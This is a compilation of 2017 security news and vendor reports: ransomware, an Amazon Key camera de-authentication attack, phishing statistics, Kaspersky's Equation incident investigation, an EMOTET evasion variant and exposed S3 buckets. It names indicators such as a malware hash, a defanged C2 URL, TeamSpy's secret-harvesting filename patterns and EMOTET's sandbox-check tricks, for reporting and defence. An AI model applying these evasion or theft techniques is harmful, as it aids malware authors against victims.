The malware researcher Lawrence Abrams explained that this latest version of the ransomware uses the same encryption methods of previously discovered variants, but he noticed some slight differences.

CryptoMix ransomware

The ransom note maintained the same file name _HELP_INSTRUCTION.TXT, but now uses the y0000@tuta.io, y0000@protonmail.com, y0000z@yandex.com, and y0000s@yandex.com emails for a victim to contact for payment information.

This variant of the CryptoMix ransomware contains 11 public RSA-1024 encryption keys that will be used to encrypt the AES key used to encrypt the files on the victim’s PC.

“This allows the ransomware to work completely offline with no network communication. This variant’s 11 public RSA keys are the same as the previous XZZX Cryptomix Ransomware variant.” wrote Abrams.

As usual, let me suggest to backup your data and test the backup files to avoid ugly surprises.

Install a security software and maintain it and any other application up to date. It could be useful to install specific anti-ransomware solution that implements behavioral.

Colleagues have published an interesting article on ransomware protection titled “How to Protect and Harden a Computer against Ransomware.”

De-authentication attack on Amazon Key could let crooks to disable your camera
19.11.2017 securityaffairs  IoT

Researchers with Rhino Security Labs demonstrated how to disable the camera on Amazon Key, which could let a rogue courier to access the customers’ home.
Earlier this month, Amazon announced for its Prime members the Amazon Key, a program that would allow a delivery person to enter your home under video surveillance, securely drop off the package, and leave with the door locking behind them. The system could also be used to grant access to the people you trust, like your family, friends, or house cleaner.

Sincerely, I don’t like this idea, but many Prime users will appreciate it for sure.

Well, these users have to know that experts from the security firm Rhino Security Labs demonstrated how easy it is to hack the Amazon Key allowing unauthorized people to access your home.

The researchers have discovered a flaw in Amazon’s Key delivery service and Cloud Cam security camera that could be exploited by a rogue courier to tamper with the camera and knock it offline, making it appear no one is entering home.

Amazon Key app.png

Homeowners can use the Amazon Key app to remotely monitor their front door via a video feed and receive Amazon delivery alerts, the app used by Prime customers could be used to unlock and lock their door.

Experts from Rhino Labs developed an application that can forge a request from the Wi-Fi router the Cloud Cam device is connected to instruct the camera to halt displaying a frozen image on the video feed making it appear the user’s front door is closed.

The experts published a video PoC of so-called de-authentication attack. The attack sees a courier unlocks the front door using the Amazon Key app, then the attacker sends a de-authorization command to the Cloud Cam for turning off the camera.

The attack repeatedly blocks the Wi-Fi signal causing the Amazon Key app displaying a frozen image until the attackers cease the jamming.

“The camera is very much something Amazon is relying on in pitching the security of this as a safe solution,” Ben Caudill, the founder of the Seattle-based security firm Rhino Security Labs, told Wired. “Disabling that camera on command is a pretty powerful capability when you’re talking about environments where you’re relying heavily on that being a critical safety mechanism.”

Then a rogue delivery person could unlock the door and surreptitiously enter the house without being seen on the Cloud Cam feed.

“We currently notify customers if the camera is offline for an extended period… Later this week, we will deploy an update to more quickly provide notifications if the camera goes offline during delivery.” reads a statement published by Amazon.

“The service will not unlock the door if the Wi-Fi is disabled and the camera is not online.”

Amazon believes the Rhino Labs’s attack poses little risk to customers because it requests specific technical skills to be arranged and also emphasizes the root of the problem is tied to an issue with the Wi-Fi protocol, not the Amazon Key.

While Amazon points out that every driver’s action is recorded, Rhino Labs researchers speculate that a malicious third-party can follow around an Amazon delivery person to power the attack.

Amazon added that this type of attack is even less likely to succeed, because the delivery person must double-check a door is locked after every delivery according its policy.

Kaspersky Lab – Beyond Black Friday Threat Report, November 2017
19.11.2017 Kaspersky Analysis  CyberCrime
Beyond Black Friday Threat Report 2017
The festive holiday shopping season, which covers Thanksgiving, Black Friday and Cyber Monday in late November as well as Christmas in December, now accounts for a significant share of annual sales for retailers, particularly in the U.S., Europe and APAC.

Those selling clothing, jewellery, consumer electronics, sports, hobbies and books can make around a quarter of their sales during the holiday period. In 2017, holiday sales in the U.S. alone are expected to be up by 3.6 to 4.0 per cent on the same time in 2016.

For brands looking to make the most of this annual spending spree, the desire to sell as much as possible at a time of intense competition is leading to ever more aggressive marketing campaigns – particularly online.

Promotional emails, banner ads, social media posts and more bombard consumers over the holiday months; generating a great deal of noise. Tactics such as one-click buying are designed to making the purchase process ever easier and faster. Further, up to three quarters of emails received on Black Friday and Cyber Monday are now opened on a mobile device. People are becoming used to making instant decisions – and that has significant security implications. They may miss vital signs that things are not what they seem and their data could be at risk.

All this makes this time of year an ideal hunting ground for hackers, phishers and malware spreaders; disguising their attacks as offers too good to refuse, a concerned security message from your bank requiring urgent attention, a special rate discount from your credit card service, and more. All you have to do is enter your personal details, card numbers or bank account credentials.

Not surprisingly, messages or links designed to look as if they come from well-known, trusted brands, payment cards and banks account for many of the malicious communications detected by Kaspersky Lab’s systems in the last few years.

Methodology and Key Findings
The overview is based on information gathered by Kaspersky Lab’s heuristic anti-phishing component that activates every time a user tries to open a phishing link that has not yet been added to Kaspersky Lab’s database. Data is presented either as the number of attacks or the number of attacked users. It updates the 2016 Black Friday overview report with data covering the fourth quarter of 2016 through to 18 October, 2017.

Key Findings:
Following a decline in 2015, financial phishing abusing online payment systems, banks and retailers increased again in 2016.
Financial phishing now accounts for half (49.77 per cent) of all phishing attacks, up from 34.33 per cent in 2015.
Mobile-first consumers are likely to be a key driver behind the rise in financial phishing: the use of smartphones for online banking, payment and shopping has doubled in a year, and mobile users will have less time to think and check each action, particularly if they are out and about.
Attack levels are now fairly consistent throughout the year; and Q4 data shows they are also more evenly spread in terms of the brand names the phishers make use of.
Data for both 2015 and 2016 shows a clear attack peak on Black Friday, followed by a fall. In 2016 the number of attacks fell by up to 33 per cent between Friday and Saturday, despite Saturday being the second biggest shopping day over the holiday weekend in the U.S.
Financial phishers are exploiting the Black Friday name in their attacks, as well as consumer awareness of, and concerns about online security – disguising their attack messages as security alerts, implications that the user has been hacked, or adding reassuring-sounding security messages.
Phishing – a universal threat
As earlier editions of the Black Friday overview have shown, phishing is one of the most popular ways of stealing personal information, including payment card details and credentials to online banking accounts. The schemes are fairly easy to set up, requiring limited investment and skills – and are mainly reliant on encouraging people to voluntarily part with their personal and financial information.

Originally spread mainly through emails – phishing attacks are now also carried out through website banners and pop-ups, links, instant messaging, SMS, forums, blogs and social media.

Percentage of users on whose computers Kaspersky Lab’s heuristic anti-phishing system was triggered as a proportion of the total number of Kaspersky Lab users in that country, Q1-Q3 2017

Phishing has a global reach. Kaspersky Lab data on attempted attacks shows that in 2017, China, Australia, Brazil were particularly vulnerable – with up to a quarter or more (28 per cent) of users targeted. Followed by North America., large parts of Western Europe, the Russian federation, Latin America, India and elsewhere – where up to one in six (17 per cent) were affected.

A new pool for phishers
During the holiday period, consumers can become more exposed online. An onslaught of promotional emails, offers and ads, the pressure to buy gifts, and a growing tendency to use their smartphone for everything, can mean that people are browsing and buying through a relatively small screen and often while out and about surrounded by distractions. Taken together, the can make them easier to mislead and manipulate through social engineering and high quality spoofed web interfaces.

The 2017 Kaspersky Cybersecurity Index shows how important smartphones have become for online banking, payment and retail transactions.

Between the first six months of 2016 and the same period in 2017, online shopping on smartphones increased from 24 per cent to 43 per cent; online banking from 22 per cent to 35 per cent; and the use of online payment systems from 14 per cent to 29 per cent. Further, the use of smartphones to send and receive emails grew from 44 per cent to 59 per cent over the same period.

The Kaspersky Lab phishing data used in this report focuses on the attack rather than the device the messages/links are received or opened on, but the trend towards mobile-first behavior among consumers is creating new opportunities for cybercriminals that they will not hesitate to capitalize on.

Financial phishing on the rise
As more people adopt online payment and shopping, the theft of financial information or credentials to online bank accounts is a growing target. The proportion of phishing attacks focused on financial data has risen steadily over the last few years and now accounts for half of all phishing attacks.

Financial phishing as a share of the overall number of phishing attacks, 2013 – 2017 (to end Q3)

This popularity means that attack levels now remain fairly consistent throughout the year. The gap that previously existed between the number of attacks experienced during the high spending holiday period, and those registered in the rest of the year, seemed to close in 2016.

The proportion of phishing that was financial phishing over the whole year, and during the holiday period

However, when you dig deeper into the data it becomes clear that the holiday season continues to represent a time of significant and greater risk of falling victim to financial phishing – mainly because of clear localized attack peaks, but probably also because of the increased vulnerability of distracted mobile shoppers and the surge of marketing noise.

Types of financial phishing
We define three categories of financial phishing, depending on what is being exploited: online banking, online payment or online shopping. Each type has evolved at a different, and not always consistent rate over the last few years.

2013 Full year Q4
Financial phishing total 31.45% 32.02%
Online shop 6.51% 7.80%
Online banks 22.20% 18.76%
Online payments 2.74% 5.46%
2014 Full year Q4
Financial phishing total 28.73% 38.49%
Online shop 7.32% 12.63%
Online banks 16.27% 17.94%
Online payments 5.14% 7.92%
2015 Full year Q4
Financial phishing total 34.33% 43.38%
Online shop 9.08% 12.29%
Online banks 17.45% 18.90%
Online payments 7.08% 12.19%
2016 Full year Q4
Financial phishing total 47.48% 48.14%
Online shop 10.41% 10.17%
Online banks 25.76% 26.35%
Online payments 11.55% 11.37%
2017 Q1-Q3
Financial phishing total 49.77%
Online shop 9.98%
Online banks 24.47%
Online payments 15.31%
The change in the share of different types of financial phishing in 2013-2017

Attackers follow consumer adoption trends
Data for the first three quarters of 2017 shows a slight drop in all financial phishing categories with the exception of online payment systems.

Looking at the dynamics of Q4 attacks using the names of leading payment systems it is clear that cybercriminals are adapting to reflect the growing use of online payment methods such as PayPal. But overall, there seems to be a disappearance of extremes, with attacks spread more evenly across the different brand names.

The change in the use of online payment system brands in financial phishing attacks, Q4, 2013-2016

Multi-brand retailers remain a top choice for financial phishing
In terms of retail brand, the leading names used by attackers over the last few years have barely changed – but the number of attacks in Q4 using each brand have also become more evenly spread. This could reflect growing consumer adoption of online shopping. Most of the top names supply multiple brands (Amazon, Alibaba, Taobao, eBay).

The change in the use of online retail brands in financial phishing attacks, Q4 2013-2016

In short, financial phishing is no longer focused on one or two brands to the exclusion of all others, the attackers are widening their net – and this has far-reaching security implications. No brand can be assumed to be safe, or even safer.

Further, looking at the daily spread of attacks during the week leading up to Black Friday it can be seen that there are some major red flag days when consumers are more vulnerable than ever.

Black Friday attacks
The following chart shows how the number of financial phishing attacks peak on Black Friday (November 25 in 2016, and November 27 in 2015), followed by a decline – particularly in 2016 when attacks detected fell by 33 per cent within a day (from around 770,000 to 510,000 detections). Weekends generally see lower levels of attacks and fewer people online, but in the U.S. the day after Black Friday is the second biggest shopping day of the year.

The change in the number of phishing attacks using names of popular retail, banking and payment brands during Black Friday week 2015 and 2016 (data from all Kaspersky Lab security components – heuristic, offline and cloud detections)

Conclusion and advice
The main purpose of the report is to raise awareness of a threat that consumers, retailers, financial services and payments systems may encounter over the holiday season. Cybercriminals out for financial information and account details – and ultimately money – are increasingly adept at hiding in the noise, targeting their attacks and exploiting human emotions, such as fear and desire. For further information and advice, please see the full overview.

Investigation Report for the September 2014 Equation malware detection incident in the US
19.11.2017 Kaspersky Analysis 
Appendix: Analysis of the Mokes/SmokeBot backdoor from theincident
In early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee’s home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:

Was our software used outside of its intended functionality to pull classified information from a person’s computer?
When did this incident occur?
Who was this person?
Was there actually classified information found on the system inadvertently?
If classified information was pulled back, what happened to said data after? Was it handled appropriately?
Why was the data pulled back in the first place? Is the evidence this information was passed on to “Russian Hackers” or Russian intelligence?
What types of files were gathered from the supposed system?
Do we have any indication the user was subsequently “hacked” by Russian hackers and data exfiltrated?
Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers’ computers?
Assuming cyberspies were able to see the screens of our analysts, what could they find on it and how could that be interpreted?
Answering these questions with factual information would allow us to provide reasonable materials to the media, as well as show hard evidence on what exactly did or did not occur, which may serve as a food for thought to everyone else. To further support the objectivity of the internal investigation we ran our investigation using multiple analysts of non-Russian origin and working outside of Russia to avoid even potential accusations of influence.

The Wall Street Journal Article
The article published in October laid out some specifics that need to be documented and fact checked. Important bullet points from the article include:

The information “stolen” provides details on how the U.S. penetrates foreign computer networks and defends against cyberattacks.
A National Security Agency contractor removed the highly classified material and put it on his home computer.
The data ended up in the hands of so called “Russian hackers” after the files were detected using Kaspersky Lab software.
The incident occurred in 2015 but wasn’t discovered until spring of last year [2016].
The Kaspersky Lab linked incident predates the arrest last year of another NSA contractor, Harold Martin.
“Hackers” homed in on the machine and stole a large amount of data after seeing what files were detected using Kaspersky data.
Beginning of Search
Having all of the data above, the first step in trying to answer these questions was to attempt to identify the supposed incident. Since events such as what is outlined above only occur very rarely, and we diligently keep the history of all operations, it should be possible to find them in our telemetry archive given the right search parameters.

The first assumption we made during the search is that whatever data was allegedly taken, most likely had to do with the so-called Equation Group, since this was the major research in active stage during the time of alleged incident as well as many existing links between Equation Group and NSA highlighted by the media and some security researchers. Our Equation signatures are clearly identifiable based on the malware family names, which contain words including “Equestre”, “Equation”, “Grayfish”, “Fanny”, “DoubleFantasy” given to different tools inside the intrusion set. Taking this into account, we began running searches in our databases dating back to June 2014 (6 months prior to the year the incident allegedly happened) for all alerts triggered containing wildcards such as “HEUR:Trojan.Win32.Equestre.*”. Results showed quickly: we had a few test (silent) signatures in place that produced a LARGE amount of false positives. This is not something unusual in the process of creating quality signatures for a rare piece of malware. To alleviate this, we sorted results by count of unique hits and quickly were able to zoom in on some activity that happened in September 2014. It should be noted that this date is technically not within the year that the incident supposedly happened, but we wanted to be sure to cover all bases, as journalists and sources sometimes don’t have all the details.

Below is a list of all hits in September for an “Equestre” signature, sorted by least amount to most. You can quickly identify the problem signature(s) mentioned above.

Detection name (silent) Count
HEUR:Trojan.Win32.Equestre.u 1
HEUR:Trojan.Win32.Equestre.gen.422674 3
HEUR:Trojan.Win32.Equestre.gen.422683 3
HEUR:Trojan.Win32.Equestre.gen.427692 3
HEUR:Trojan.Win32.Equestre.gen.427696 4
HEUR:Trojan.Win32.Equestre.gen.446160 6
HEUR:Trojan.Win32.Equestre.gen.446979 7
HEUR:Trojan.Win32.Equestre.g 8
HEUR:Trojan.Win32.Equestre.ab 9
HEUR:Trojan.Win32.Equestre.y 9
HEUR:Trojan.Win32.Equestre.l 9
HEUR:Trojan.Win32.Equestre.ad 9
HEUR:Trojan.Win32.Equestre.t 9
HEUR:Trojan.Win32.Equestre.e 10
HEUR:Trojan.Win32.Equestre.v 14
HEUR:Trojan.Win32.Equestre.gen.427697 18
HEUR:Trojan.Win32.Equestre.gen.424814 18
HEUR:Trojan.Win32.Equestre.s 19
HEUR:Trojan.Win32.Equestre.x 20
HEUR:Trojan.Win32.Equestre.i 24
HEUR:Trojan.Win32.Equestre.p 24
HEUR:Trojan.Win32.Equestre.q 24
HEUR:Trojan.Win32.Equestre.gen.446142 34
HEUR:Trojan.Win32.Equestre.d 39
HEUR:Trojan.Win32.Equestre.j 40
HEUR:Trojan.Win32.Equestre.gen.427734 53
HEUR:Trojan.Win32.Equestre.gen.446149 66
HEUR:Trojan.Win32.Equestre.ag 142
HEUR:Trojan.Win32.Equestre.b 145
HEUR:Trojan.Win32.Equestre.h 310
HEUR:Trojan.Win32.Equestre.gen.422682 737
HEUR:Trojan.Win32.Equestre.z 1389
HEUR:Trojan.Win32.Equestre.af 2733
HEUR:Trojan.Win32.Equestre.c 3792
HEUR:Trojan.Win32.Equestre.m 4061
HEUR:Trojan.Win32.Equestre.k 6720
HEUR:Trojan.Win32.Equestre.exvf.1 6726
HEUR:Trojan.Win32.Equestre.w 6742
HEUR:Trojan.Win32.Equestre.f 9494
HEUR:Trojan.Win32.Equestre.gen.446131 26329
HEUR:Trojan.Win32.Equestre.aa 87527
HEUR:Trojan.Win32.Equestre.gen.447002 547349
HEUR:Trojan.Win32.Equestre.gen.447013 1472919
Taking this list of alerts, we started at the top and worked our way down, investigating each hit as we went trying to see if there were any indications it may be related to the incident. Most hits were what you would think: victims of Equation or false positives. Eventually we arrived at a signature that fired a large number of times in a short time span on one system, specifically the signature “HEUR:Trojan.Win32.Equestre.m” and a 7zip archive (referred below as “[undisclosed].7z”). Given limited understanding of Equation at the time of research it could have told our analysts that an archive file firing on these signatures was an anomaly, so we decided to dig further into the alerts on this system to see what might be going on. After analyzing the alerts, it was quickly realized that this system contained not only this archive, but many files both common and unknown that indicated this was probably a person related to the malware development. Below is a list of Equation specific signatures that fired on this system over a period of approximately three months:


In total we detected 37 unique files and 218 detected objects, including executables and archives containing malware associated with the Equation Group. Looking at this metadata during current investigation we were tempted to include the full list of detected files and file paths into current report, however, according to our ethical standards, as well as internal policies, we cannot violate our users’ privacy. This was a hard decision, but should we make an exception once, even for the sake of protecting our own company’s reputation, that would be a step on the route of giving up privacy and freedom of all people who rely on our products. Unless we receive a legitimate request originating from the owner of that system or a higher legal authority, we cannot release such information.

The file paths observed from these detections indicated that a developer of Equation had plugged in one or more removable drives, AV signatures fired on some of executables as well as archives containing them, and any files detected (including archives they were contained within) were automatically pulled back. At this point in time, we felt confident we had found the source of the story fed to Wall Street Journal and others. Since this type of event clearly does not happen often, we believe some dates were mixed up or not clear from the original source of the leak to the media.

Our next task was to try and answer what may have happened to the data that was pulled back. Clearly an archive does not contain only those files that triggered, and more than likely contained a possible treasure trove of data pertaining to the intrusion set. It was soon discovered that the actual archive files themselves appear to have been removed from our storage of samples, while the individual files that triggered the alerts remained.

Upon further inquiring about this event and missing files, it was later discovered that at the direction of the CEO, the archive file, named “[undisclosed].7z” was removed from storage. Based on description from the analyst working on that archive, it contained a collection of executable modules, four documents bearing classification markings, and other files related to the same project. The reason we deleted those files and will delete similar ones in the future is two-fold; We don’t need anything other than malware binaries to improve protection of our customers and secondly, because of concerns regarding the handling of potential classified materials. Assuming that the markings were real, such information cannot and will not consumed even to produce detection signatures based on descriptions.

This concern was later translated into a policy for all malware analysts which are required to delete any potential classified materials that have been accidentally collected during anti-malware research or received from a third party. Again to restate: to the best of our knowledge, it appears the archive files and documents were removed from our storage, and only individual executable files (malware) that were already detected by our signatures were left in storage. Also, it is very apparent that no documents were actively “detected on” during this process. In other words, the only files that fired on specific Equation signatures were binaries, contained within an archive or outside of it. The documents were inadvertently pulled back because they were contained within the larger archive file that alerted on many Equation signatures. According to security software industry standards, requesting a copy of an archive containing malware is a legitimate request, which often helps security companies locate data containers used by malware droppers (i.e. they can be self-extracting archives or even infected ISO files).

An Interesting Twist
During the investigation, we also discovered a very interesting twist to the story that has not been discussed publicly to our knowledge. Since we were attempting to be as thorough as possible, we analyzed EVERY alert ever triggered for the specific system in question and came to a very interesting conclusion. It appears the system was actually compromised by a malicious actor on October 4, 2014 at 23:38 local time, specifically by a piece of malware hidden inside a malicious MS Office ISO, specifically the “setup.exe” file (md5: a82c0575f214bdc7c8ef5a06116cd2a4 – for detection coverage, see this VirusTotal link) .

Looking at the sequence of events and detections on this system, we quickly noticed that the user in question ran the above file with a folder name of “Office-2013-PPVL-x64-en-US-Oct2013.iso”. What is interesting is that this ISO file is malicious and was mounted and subsequently installed on the system along with files such as “kms.exe” (a name of a popular pirated software activation tool), and “kms.activator.for.microsoft.windows.8.server.2012.and.office.2013.all.editions”. Kaspersky Lab products detected the malware with the verdict Backdoor.Win32.Mokes.hvl.

At a later time after installation of the supposed MS Office 2013, the antivirus began blocking connections out on a regular basis to the URL “http://xvidmovies[.]in/dir/index.php”. Looking into this domain, we can quickly find other malicious files that beacon to the same URL. It’s important to note that the reason we know the system was beaconing to this URL is because we were actively blocking it as it was a known bad site. This does however indicate the user actively downloaded / installed malware on the same system around the same time frame as our detections on the Equation files.

To install and run this malware, the user must have disabled Kaspersky Lab products on his machine. Our telemetry does not allow us to say when the antivirus was disabled, however, the fact that the malware was later detected as running in the system suggests the antivirus had been disabled or was not running when the malware was run. Executing the malware would not have been possible with the antivirus enabled.

Additionally, there also may have been other malware from different downloads that we were unaware of during this time frame. Below is a complete list of the 121 non-Equation specific alerts seen on this system over the two month time span:


At this point, we had the answers to the questions we felt could be answered. To summarize, we will address each one below:

Q1 – Was our software used outside of its intended functionality to pull classified information from a person’s computer?

A1 – The software performed as expected and notified our analysts of alerts on signatures written to detect on Equation group malware that was actively under investigation. In no way was the software used outside of this scope to either pull back additional files that did not fire on a malware signature or were not part of the archive that fired on these signatures.

Q2 – When did this incident occur?

A2 – In our professional opinion, the incident spanned between September 11, 2014 and November 17, 2014.

Q3 – Who was this person?

A3 – Because our software anonymizes certain aspects of users’ information, we are unable to pinpoint specifically who the user was. Even if we could, disclosing such information is against our policies and ethical standards. What we can determine is that the user was originating from an IP address that is supposedly assigned to a Verizon FiOS address pool for the Baltimore, MD and surrounding area.

Q4 – Was there actually classified information found on the system inadvertently?

A4 – What is believed to be potentially classified information was pulled back because it was contained within an archive that fired on an Equation specific malware signatures. Besides malware, the archive also contained what appeared to be source code for Equation malware and four Word documents bearing classification markings.

Q5 – If classified information was pulled back, what happened to said data after? Was it handled appropriately?

A5 – After discovering the suspected Equation malware source code and classified documents, the analyst reported the incident to the CEO. Following a request from the CEO, the archive was deleted from all of our systems. With the archive that contained the classified information being subsequently removed from our storage locations, only traces of its detection remain in our system (i.e. – statistics and some metadata). We cannot assess whether the data was “handled appropriately” (according to US Government norms) since our analysts have not been trained on handling US classified information, nor are they under any legal obligation to do so.

Q6 – Why was the data pulled back in the first place? Is the evidence this information was passed on to “Russian Hackers” or Russian intelligence?

A6 – The information was pulled back because the archive fired on multiple Equation malware signatures. We also found no indication the information ever left our corporate networks. Transfer of a malware file is done with appropriate encryption level relying on RSA+AES with an acceptable key length, which should exclude attempts to intercept such data anywhere on the network between our security software and the analyst receiving the file.

Q7 – What types of files were gathered from the supposed system?

A7 – Based on statistics, the files that were submitted to Kaspersky Lab were mostly malware samples and suspected malicious files, either stand-alone, or inside a 7zip archive. The only files stored to date still in our sample collection from this incident are malicious binaries.

Q8 – Do we have any indication the user was subsequently “hacked” by Russian actors and data exfiltrated?

A8 – Based on the detections and alerts found in the investigation, the system was most likely compromised during this time frame by unknown threat actors. We asses this from the fact that the user installed a backdoored MS Office 2013 illegal activation tool, detected by our products as Backdoor.Win32.Mokes.hvl. To run this malware, the user must have disabled the AV protection, since running it with the antivirus enabled would not have been possible. This malicious software is a Trojan (later identified as “Smoke Bot” or “Smoke Loader”) allegedly created by a Russian hacker in 2011 and made available on Russian underground forums for purchase. During the period of September 2014-November 2014, the command and control servers of this malware were registered to presumably a Chinese entity going by the name “Zhou Lou”, from Hunan, using the e-mail address “zhoulu823@gmail.com”. We are still working on this and further details on this malware might be made available later as a separate research paper.

Of course, the possibility exists that there may have been other malware on the system which our engines did not detect at the time of research. Given that system owner’s potential clearance level, the user could have been a prime target of nation states. Adding the user’s apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands. What we are certain about is that any non-malware data that we received based on passive consent of the user was deleted from our storage.

Q9 – Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers’ computers?

A9 – Kaspersky Lab security software, like all other similar solutions from our competitors, has privileged access to computer systems to be able to resist serious malware infections and return control of the infected system back to the user. This level of access allows our software to see any file on the systems that we protect. With great access comes great responsibility and that is why a procedure to create a signature that would request a file from a user’s computer has to be carefully handled. Kaspersky malware analysts have rights to create signatures. Once created, these signatures are reviewed and committed by another group within Kaspersky Lab to ensure proper checks and balances. If there were an external attempt to create a signature, that creation would be visible not only in internal databases and historical records, but also via external monitoring of all our released signatures by third parties. Considering that our signatures are regularly reversed by other researchers, competitors, and offensive research companies, if any morally questionable signatures ever existed it would have already been discovered. Our internal analysis and searching revealed no such signatures as well.

In relation to Equation research specifically, our checks verified that during 2014-2016, none of the researchers working on Equation possessed the rights to commit signatures directly without having an experienced signature developer verifying those. If there was a doubtful intention in signatures during the hunt for Equation samples, this would have been questioned and reported by a lead signature developer.

Q10 – Assuming cyberspies were able to see screens of our analysts, what could they find on it and how could that be interpreted?

A10 – We have done a thorough search for keywords and classification markings in our signature databases. The result was negative: we never created any signatures on known classification markings. However, during this sweep we discovered something interesting in relation to TeamSpy research that we published earlier (for more details we recommend to check the original research at https://securelist.com/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/35520/). TeamSpy malware was designed to automatically collect certain files that fell into the interest of the attackers. They defined a list of file extensions, such as office documents (*.doc, *.rtf, *.xls, *.mdb), pdf files (*.pdf) and more. In addition, they used wildcard string pattern based on keywords in the file names, such as *pass*, *secret*, *saidumlo* (meaning “secret” in Georgian) and others. These patterns were hardcoded into the malware that we discovered earlier, and could be used to detect similar malware samples. We did discover a signature created by a malware analyst in 2015 that was looking for the following patterns:

These strings had to be located in the body of the malware dump from a sandbox processed sample. In addition, the malware analyst included another indicator to avoid false positives; A path where the malware dropper stored dropped files: ProgramData\Adobe\AdobeARM.

One could theorize about an intelligence operator monitoring a malware analyst’s work in the process of entering these strings during the creation of a signature. We cannot say for sure, but it is a possibility that an attacker looking for anything that can expose our company from a negative side, observations like this may work as a trigger for a biased mind. Despite the intentions of the malware analyst, they could have been interpreted wrongly and used to create false allegations against us, supported by screenshots displaying these or similar strings.

Many people including security researchers, governments, and even our direct competitors from the private sector have approached us to express support. It is appalling to see that accusations against our company continue to appear without any proof or factual information being presented. Rumors, anonymous sources, and lack of hard evidence spreads only fear, uncertainty and doubt. We hope that this report sheds some long-overdue light to the public and allows people to draw their own conclusions based on the facts presented above. We are also open and willing to do more, should that be required.

A new EMOTET Trojan variant improves evasion techniques
19.11.2017. securityaffairs

Security experts at Trend Micro had recently observed a new variant of the EMOTET banking Trojan that implements new evasion features.
EMOTET, aka Geodo, is linked to the dreaded Dridex and Feodo (Cridex, Bugat) malware families.

In past campaigns, EMOTET was used by crooks to steal banking credentials and as a malicious payload downloader.

The experts observed a re-emergence in the EMOTET activity in September, but the resents attacks present a few significant changes to elude sandbox and malware analysis.

“Based on our findings, EMOTET’s dropper changed from using RunPE to exploiting CreateTimerQueueTimer.” states Trend Micro.

The CreateTimerQueueTimer is a Windows application programming interface (API) that creates a queue for lightweight objects called timers that enable the selection of a callback function at a specified time.

“The original function of the API is to be part of the process chain by creating a timer routine, but here, the callback function of the API becomes EMOTET’s actual payload. EMOTET seems to have traded RunPE for a Windows API because the exploitation of the former has become popular while the latter is lesser known, theoretically making it more difficult to detect by security scanners,” continues Trend Micro.

Other malware already abused this Windows API, such as the Hancitor banking Trojan and VAWTRAK.

The anti-analysis functionalities implemented by the latest variant allow to check when the scanner monitors activities in order to evade the detection.

CreateTimerQueueTimer allows EMOTET do the job every 0x3E8 milliseconds, the malware can determine if it runs in a sandbox environment and terminates its process if it does.

“This variant has the ability to check if it’s inside a sandbox environment at the second stage of its payload. The EMOTET loader will not proceed if it sees that it’s running inside a sandbox environment.” continues the analysis.

The dropper checks us the NetBIOS’ name is TEQUILABOOMBOOM, the UserName, and for the presence of specific files on the system.

If it does not have admin privileges, it creates an auto start service to maintain persistence on the infected machine, renames it and starts it, collects system information, encrypts it, and sends it via a POST request to the command and control (C&C) server.

The new EMOTET variant is distributed via phishing messages containing a malicious URL used to drop weaponized document.

Trend Micro also published the Indicators of Compromise (IoCs) for the latest version of the malware.

Further details on the EMOTET C&C infrastructure were published by the popular security researcher MalwareTech (Marcus Hutchins).

“Using hacked websites to proxy C2 servers has become much more common because it adds a layer of protection preventing researchers from easily finding and shutting down the actual C2 server; furthermore, it’s hard for security companies to flag the servers as malicious when they’re actually legitimate websites which have been running for years, not new servers set up with domains bought the day before.” wrote MalwareTech.

Terabytes of US military social media surveillance miserably left wide open in AWS S3 buckets
19.11.2017. securityaffairs BigBrothers

Three AWS S3 buckets containing dozen of terabytes resulting from surveillance on US social media were left wide open online.
It has happened again, other three AWS S3 buckets containing dozen of terabytes resulting from surveillance on US social media were left wide open online.

The misconfigured AWS S3 buckets contain social media posts and similar pages that were scraped from around the world by the US military to identify and profile persons of interest.

The huge trove of documents was discovered by the popular data breach hunter Chris Vickery, the three buckets were named centcom-backup, centcom-archive, and pacom-archive.

CENTCOM is the abbreviation for the US Central Command, the US Military command that covers the Middle East, North Africa and Central Asia, similarly PACOM is the for US Pacific Command that covers the Southern Asia, China and Australasia.

Vickery was conducting an ordinary scan for the word “COM” in publicly accessible S3 buckets when spotted the unsecured buckets, one of them contained 1.8 billion social media posts resulting from automatic craping activities conducted over the past eight years up to today. According to Vickery, it mainly contains postings made in central Asia, in many cases comments made by US individuals.

Documents reveal that the archive was collected as part of the US government’s Outpost program, which is a social media monitoring and narrowcasting campaign designed to target youngsters and educate them to despise the terrorism.

The archive discovered by Vickery in fact includes the Outpost development, configuration files, as well as Apache Lucene indexes of keywords designed to be used with the open-source search engine Elasticsearch.

“While public information about this firm is scant, an internet search reveals multiple individuals who worked for VendorX describing work building Outpost for CENTCOM and the Defense Department” reads the blog post published by Upguard.

US government AWS S3 buckets surveillance

Another folder titled “Coral” likely refers to the US Army’s “Coral Reef” intelligence software.

“This folder contains a directory named “INGEST” that contained all the posts scraped and held in the “centcom-backup” bucket. The Coral Reef program “allows users of intelligence to better understand relationships between persons of interest” as a component of the Distributed Common Ground System-Army (DCGS-A) intelligence suite, “the Army’s primary system for the posting of data, processing of information, and dissemination to all components and echelons of intelligence, surveillance and reconnaissance information about the threats, weather, and terrain” programs. Such a focus on gathering intelligence about “persons of interest” would be even more clear-cut in the other two buckets, starting with “centcom-archive.” continues the post.

US government AWS S3 buckets surveillance 2

The bucket “centcom-archive” contains an impressive volume of internet posts stored in the same XML text file format as seen in “centcom-backup,” at least 1.8 billion such posts are stored here.

“The bucket “centcom-archive” contains more scraped internet posts stored in the same XML text file format as seen in “centcom-backup,” only on a much larger scale: conservatively, at least 1.8 billion such posts are stored here.” states the post.

It is disturbing how this material was leaked online due to misconfigured AWS S3 buckets, foreign governments and terrorist organization may have had access to the archive such as Vickery.

Vickery notified the American military about the discovery and the buckets have now been locked down and hidden.

It isn’t the first time that data from US Military was discovered online, in September researchers from cybersecurity firmUpGuard discovered thousands of files containing personal data on former US military, intelligence, and government workers have allegedly been exposed online for months.

City of Spring Hill in Tennessee still hasn’t recovered from ransomware attack
18.11.2017 securityaffairs

